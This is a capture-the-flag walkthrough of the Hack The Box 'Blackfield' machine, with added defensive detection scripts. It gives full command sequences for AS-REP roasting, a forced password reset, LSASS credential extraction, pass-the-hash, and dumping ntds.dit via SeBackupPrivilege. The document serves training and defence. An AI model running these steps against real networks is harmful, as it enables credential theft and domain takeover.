HTB - Blackfield

Walkthrough Summary

Step  Action                  Tool                        Achieved
1     SMB Enumeration         NetExec                     Obtained usernames
2     ASREPRoasting           GetNPUsers                  Obtained password for support
3     Domain Enumeration      BloodHound.py, BloodHound   Obtained credentials for audit2020
4     SMB Enumeration         NetExec, pypykatz           Obtained hash for svc_backup (initial foothold)
5     Privilege Exploitation  diskshadow, robocopy        Exfiltrated ntds.dit & system.hive
6     Hash Dump               SecretsDump, NetExec        Compromised domain

Attack Chain Reproduction Steps

TCP all-ports scan:

$ sudo nmap 10.10.10.192 -T4 -p- -A -open

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-20 22:39:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Important things to note based on Nmap’s output:

  • Domain name: BLACKFIELD.LOCAL
  • Host name: DC01
  • WinRM available (5985)

Before proceeding to enumerate the SMB and LDAP services, we should add blackfield.local and dc01.blackfield.local to our local DNS file (/etc/hosts).

# enumerating SMB shares
$ nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\guest:
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON                        Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL                          Logon server share

Spidering the profiles$ share reveals various usernames:

$ nxc smb 10.10.10.192 -u 'anonymous' -p '' --spider 'profiles$' --regex .
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\anonymous:
SMB         10.10.10.192    445    DC01             [*] Started spidering
SMB         10.10.10.192    445    DC01             [*] Spidering .
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/. [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/.. [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/AAlleni [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/ABarteski [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/ABekesz [dir]
<SNIP>
SMB         10.10.10.192    445    DC01             [*] Done spidering (Completed in 55.86900997161865)

# create a username list
$ nxc smb 10.10.10.192 -u 'anonymous' -p '' --spider 'profiles$' --regex . > nxc_spider.txt
# -F keeps '[dir]' literal (unescaped, [dir] is a character class matching d, i or r); the . and .. entries are dropped
$ grep -F '[dir]' nxc_spider.txt | cut -d'/' -f5 | cut -d' ' -f1 | grep -vxF -e '.' -e '..' | sort -u > domain_users.txt

Check for ASREPRoastable accounts:

$ getnpusers blackfield.local/ -dc-ip 10.10.10.192 -no-pass -usersfile domain_users.txt | grep 'krb5\|User'
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:9f6ca396e535881d3e763ec8b9ac02d3$5601e4935152a25b38784ffcec4dfb846fad6acd52b0337af240a62083dc59eca7344b3b4b4b6cbe5c925f4ca3378aecd925e0021b55b64590227069c7709c56494f96d7c0b4677df2cb2b99b8a4196443656485462f6feb37fdeeac1ca82eb0d381e3807ced88ca442249c21ba2e6ae354a2de9fe31f33283730232a00b62520734ec9c70b307be113472519ef94d6cd4f1d5276aaed7bcd3d9b719ea7eec729b8afa7bd71e88ca0c99837eb91bc18d4526ce67895d74a4bc61fc3ae6922c44d3213f1b56a7af8d2009e59371d1778d19ccf3be01c568a097d3545a053691af1e553bd8ed0f74d75ba63b71afb00a99678b4be9
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

We have three valid usernames, one of which is ASREPRoastable, so we can crack its hash:

$ hashcat -m 18200 support_hash /usr/share/wordlists/rockyou.txt

<SNIP>
$krb5asrep$23$support@BLACKFIELD.LOCAL:0fb<REDACTED>e87:#0<REDACTED>ht
<SNIP>
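As an added defender-side example (not part of the original write-up), the following Python parses the mode-18200 hash format cracked above, lists which accounts in an LDAP export have the UF_DONT_REQUIRE_PREAUTH bit set, and applies the matching event 4768 rule; the LDAP dictionaries and event records are constructed, and the 4768 field names follow the event's XML data names.

```python
# Added example (not from the original write-up): audit helpers for the AS-REP
# roasting step above. The parser handles the $krb5asrep$ hashcat-18200 format
# shown on the page; the UAC check and the 4768 rule are the defender-side checks
# an admin would run to find and detect such accounts. All sample data is constructed.
import re

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit behind "ASREPRoastable"
RC4_HMAC = 0x17                      # etype 23 in the hash header; weakest common etype

ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<enc>[0-9a-f]+)$"
)

def parse_asrep_hash(line):
    """Split a hashcat mode-18200 line into its fields; None if malformed."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    return {"etype": int(m["etype"]), "user": m["user"], "realm": m["realm"],
            "checksum": m["checksum"], "enc": m["enc"]}

def roastable_accounts(users):
    """Return sAMAccountNames whose userAccountControl has the pre-auth bit set."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)

def suspicious_4768(events):
    """Flag TGT requests (event 4768) with no pre-authentication and RC4 etype,
    the combination an AS-REP roasting run such as getnpusers leaves behind."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == 0
            and e["TicketEncryptionType"] == RC4_HMAC]

# Constructed sample data mirroring the page (hash body shortened, not real).
SAMPLE_HASH = "$krb5asrep$23$support@BLACKFIELD.LOCAL:" + "9f" * 16 + "$" + "56" * 40
SAMPLE_USERS = [  # 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    {"sAMAccountName": "support",    "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "audit2020",  "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200},
]
SAMPLE_EVENTS = [  # constructed 4768/4769 records, not real logs
    {"EventID": 4768, "TargetUserName": "support",    "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"EventID": 4768, "TargetUserName": "audit2020",  "PreAuthType": 2, "TicketEncryptionType": 0x12},
    {"EventID": 4769, "TargetUserName": "svc_backup", "PreAuthType": 0, "TicketEncryptionType": 0x17},
]

if __name__ == "__main__":
    print(parse_asrep_hash(SAMPLE_HASH))
    print("roastable:", roastable_accounts(SAMPLE_USERS))
    print("4768 hits:", suspicious_4768(SAMPLE_EVENTS))
```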

Now that we have credentials, we can obtain group information about the other two users:

$ nxc ldap 10.10.10.192 -u 'support' -p '#0<REDACTED>ht' -M groupmembership -o USER=audit2020
<SNIP>
GROUPMEM... 10.10.10.192    389    DC01             [+] User: audit2020 is member of following groups:
GROUPMEM... 10.10.10.192    389    DC01             Domain Users

$ nxc ldap 10.10.10.192 -u 'support' -p '#0<REDACTED>ht' -M groupmembership -o USER=svc_backup
<SNIP>
GROUPMEM... 10.10.10.192    389    DC01             [+] User: svc_backup is member of following groups:
GROUPMEM... 10.10.10.192    389    DC01             Remote Management Users
GROUPMEM... 10.10.10.192    389    DC01             Backup Operators
GROUPMEM... 10.10.10.192    389    DC01             Domain Users

We can also collect domain information and let BloodHound analyze it:

$ bloodhound-python -u support -p '#0<REDACTED>ht' -dc dc01.blackfield.local -c all -d BLACKFIELD.LOCAL -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
<SNIP>
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 06S

The BloodHound data suggests that the support account can change the password of the audit2020 account:

# change user's password
$ net rpc password 'audit2020' 'p@ssw0rd!' -U "blackfield.local/support%#0<REDACTED>ht" -S dc01.blackfield.local

# confirm credentials
$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!

We can also change the user’s password using rpcclient.

Check the content of the forensic share:

$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!' --share forensic -M spider_plus
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!
SPIDER_P... 10.10.10.192    445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_P... 10.10.10.192    445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_P... 10.10.10.192    445    DC01             [*]     STATS_FLAG: True
SPIDER_P... 10.10.10.192    445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192    445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_P... 10.10.10.192    445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_P... 10.10.10.192    445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_spider_plus
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share
SPIDER_P... 10.10.10.192    445    DC01             [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.10.10.192.json".
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Shares:           7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Readable Shares:  5 (forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Filtered Shares:  1
SPIDER_P... 10.10.10.192    445    DC01             [*] Total folders found:  368
SPIDER_P... 10.10.10.192    445    DC01             [*] Total files found:    725
SPIDER_P... 10.10.10.192    445    DC01             [*] File size average:    978.9 KB
SPIDER_P... 10.10.10.192    445    DC01             [*] File size min:        0 B
SPIDER_P... 10.10.10.192    445    DC01             [*] File size max:        125.87 MB

Among the files there is an LSASS memory dump, which we can download locally:

# read output file
$ jq . /tmp/nxc_spider_plus/10.10.10.192.json
<SNIP>
    },
    "memory_analysis/lsass.zip": {
      "atime_epoch": "2020-05-28 21:25:08",
      "ctime_epoch": "2020-05-28 21:25:01",
      "mtime_epoch": "2020-05-28 21:29:24",
      "size": "39.99 MB"
    },
<SNIP>

# download file
$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!' --share forensic --get-file memory_analysis/lsass.zip lsass.zip
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!
SMB         10.10.10.192    445    DC01             [*] Copying "memory_analysis/lsass.zip" to "lsass.zip"
SMB         10.10.10.192    445    DC01             [+] File "memory_analysis/lsass.zip" was downloaded to "lsass.zip"

We can use pypykatz to extract the data from the LSASS file:

# unzip the lsass dump
$ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP

# extract the data
$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
<SNIP>
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 96<REDACTED>0d
<SNIP>
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
<SNIP>

The hash for the Administrator account does not work, but the one for the svc_backup account does:

$ nxc winrm 10.10.10.192 -u svc_backup -H 96<REDACTED>0d
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:96<REDACTED>0d (Pwn3d!)

Get a shell as svc_backup and read user.txt:

$ evil-winrm -i 10.10.10.192 -u svc_backup -H 96<REDACTED>0d

<SNIP>
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\desktop\user.txt
39<REDACTED>43

Check the user’s group memberships and privileges:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

<SNIP>

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
<SNIP>


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We can exploit the SeBackupPrivilege (Windows Privilege Escalation: SeBackupPrivilege) and dump the ntds.dit database by:

  • Write a small script for the diskshadow utility to expose the C: drive
  • Convert the script to a Windows-compatible (CRLF) format
  • Upload the script to the target
  • Move to a directory with write access
  • Expose the shadow copy
  • Download the ntds.dit database

# write a diskshadow script
$ cat diskshadow_script
set context persistent nowriters
add volume c: alias random
create
expose %random% z:

# convert file into a Windows-compatible format
$ sudo unix2dos diskshadow_script
unix2dos: converting file diskshadow_script to DOS format...

Next, within the WinRM session:

# upload script
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload diskshadow_script

Info: Uploading /home/kali/htb/ad_track/diskshadow_script to C:\Users\svc_backup\Documents\diskshadow_script

Data: 120 bytes of 120 bytes copied

Info: Upload successful!

# move within a writeable directory
*Evil-WinRM* PS C:\Windows\Temp> cd c:\windows\temp

# expose the shadow copy
*Evil-WinRM* PS C:\Windows\Temp> diskshadow /s diskshadow_script
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  3/21/2024 6:40:33 AM

-> set context persistent nowriters
-> add volume c: alias random
-> create
Alias random for shadow ID {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec} set as environment variable.

Querying all shadow copies with the shadow copy set ID {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec}

        * Shadow copy ID = {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a}               %random%
                - Shadow copy set: {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 3/21/2024 6:40:34 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %random% z:
-> %random% = {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a}
The shadow copy was successfully exposed as z:\.
->

# copy the ntds.dit database
*Evil-WinRM* PS C:\Windows\Temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, March 21, 2024 6:44:01 AM
   Source : z:\windows\ntds\
     Dest : C:\Windows\Temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              18.0 m        ntds.dit
<SNIP>
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           109734697 Bytes/sec.
   Speed :            6279.069 MegaBytes/min.
   Ended : Thursday, March 21, 2024 6:44:01 AM

# download the file
*Evil-WinRM* PS C:\Windows\Temp> download ntds.dit

Info: Downloading C:\Windows\Temp\ntds.dit to ntds.dit

Info: Download successful!

We also need to exfiltrate the system.hive file:

# make a copy of the file
*Evil-WinRM* PS C:\windows\temp> reg save HKlM\SYSTEM C:\windows\temp\system.hive
The operation completed successfully.

# download the file
*Evil-WinRM* PS C:\> download system.hive

Info: Downloading C:\\system.hive to system.hive

Info: Download successful!
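The following is an added example, not code from the write-up: it parses the whoami /priv table shown earlier, reports whether the listed privileges bypass file ACLs (the property the Backup Operators path above relies on), and applies the same check to event 4672 records; the event dictionaries are constructed and use the event's XML field names.

```python
# Added example (not from the original write-up): defender-side checks for the
# Backup Operators path used above. parse_whoami_priv() reads the table printed
# by "whoami /priv"; backup_capable() reports whether the privileges allow
# reading/restoring files regardless of ACLs; flag_4672() applies the same idea
# to Windows event 4672 (special privileges assigned to new logon).
import re

# Privileges that bypass file ACLs (read or write). A non-admin holding them can
# read files such as ntds.dit or the SYSTEM hive from a shadow copy.
ACL_BYPASS = {"SeBackupPrivilege", "SeRestorePrivilege"}

def parse_whoami_priv(text):
    """Return {privilege: state} from the 'whoami /priv' table."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def backup_capable(privs):
    """True if an ACL-bypassing privilege is assigned (a process may enable a
    disabled one, so the state column is not what matters)."""
    return bool(ACL_BYPASS & privs.keys())

def flag_4672(events, admin_accounts):
    """Names of non-admin logons (event 4672) granted an ACL-bypassing privilege."""
    hits = set()
    for e in events:
        if e["EventID"] != 4672:
            continue
        granted = set(e["PrivilegeList"].split())   # list is whitespace separated
        if e["SubjectUserName"] not in admin_accounts and granted & ACL_BYPASS:
            hits.add(e["SubjectUserName"])
    return sorted(hits)

SAMPLE_WHOAMI = """\
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
"""

SAMPLE_EVENTS = [  # constructed 4672 records, not real logs
    {"EventID": 4672, "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "PrivilegeList": "SeDebugPrivilege SeBackupPrivilege"},
    {"EventID": 4672, "SubjectUserName": "DC01$", "PrivilegeList": "SeTcbPrivilege"},
]

if __name__ == "__main__":
    p = parse_whoami_priv(SAMPLE_WHOAMI)
    print("backup capable:", backup_capable(p), sorted(ACL_BYPASS & p.keys()))
    print("4672 hits:", flag_4672(SAMPLE_EVENTS, {"Administrator"}))
```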

Now the Administrator hash can be dumped from the exfiltrated files, which lets us read the root.txt file:

# dump the administrator hash
$ secretsdump -ntds ntds.dit -system system.hive LOCAL | grep Admin
Administrator:500:aad3b435b51404eeaad3b435b51404ee:18<REDACTED>ee:::
Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
Administrator:des-cbc-md5:5d25a84ac8c229c1

# compromise the root.txt file
$ nxc smb 10.10.10.192 -u administrator -H 18<REDACTED>ee -x 'type c:\users\administrator\desktop\root.txt'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator:18<REDACTED>ee (Pwn3d!)
SMB         10.10.10.192    445    DC01             [+] Executed command via wmiexec
SMB         10.10.10.192    445    DC01             43<REDACTED>cb
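As an added example that is not part of the original write-up, this Python audits the secretsdump NTDS output format used above (user:rid:lmhash:nthash:::) for the findings a password audit looks for; the dump lines are constructed placeholders, not hashes from the box.

```python
# Added example (not from the original write-up): a small audit over the
# secretsdump NTDS output format shown above (user:rid:lmhash:nthash:::).
# It flags what a defender looks for in such a dump: stored LM hashes, blank
# passwords, NT-hash reuse between accounts and the RID-500 account.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM password is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

def parse_ntds_lines(text):
    """Yield (user, rid, lm, nt) for NTLM lines; Kerberos key lines are skipped."""
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) != 7 or not parts[1].isdigit():
            continue                              # aes/des key lines and noise
        user = parts[0].split("\\")[-1]           # drop DOMAIN\ prefix if present
        yield user, int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_ntds(text):
    """Return sorted findings as (severity, account, message) tuples."""
    findings, by_nt = [], defaultdict(list)
    for user, rid, lm, nt in parse_ntds_lines(text):
        by_nt[nt].append(user)
        if rid == 500:
            findings.append(("info", user, "built-in Administrator (RID 500)"))
        if lm != EMPTY_LM:
            findings.append(("high", user, "LM hash stored (LM storage not disabled)"))
        if nt == EMPTY_NT:
            findings.append(("high", user, "blank password"))
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append(("medium", ",".join(sorted(users)), "same NT hash (password reuse)"))
    return sorted(findings)

# Constructed dump mirroring the page's format; the hashes are placeholders.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BLACKFIELD.local\\svc_backup:1103:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
audit2020:1104:0123456789abcdef0123456789abcdef:22222222222222222222222222222222:::
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for sev, who, msg in audit_ntds(SAMPLE_DUMP):
        print(f"[{sev}] {who}: {msg}")
```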
This post is licensed under CC BY 4.0 by the author.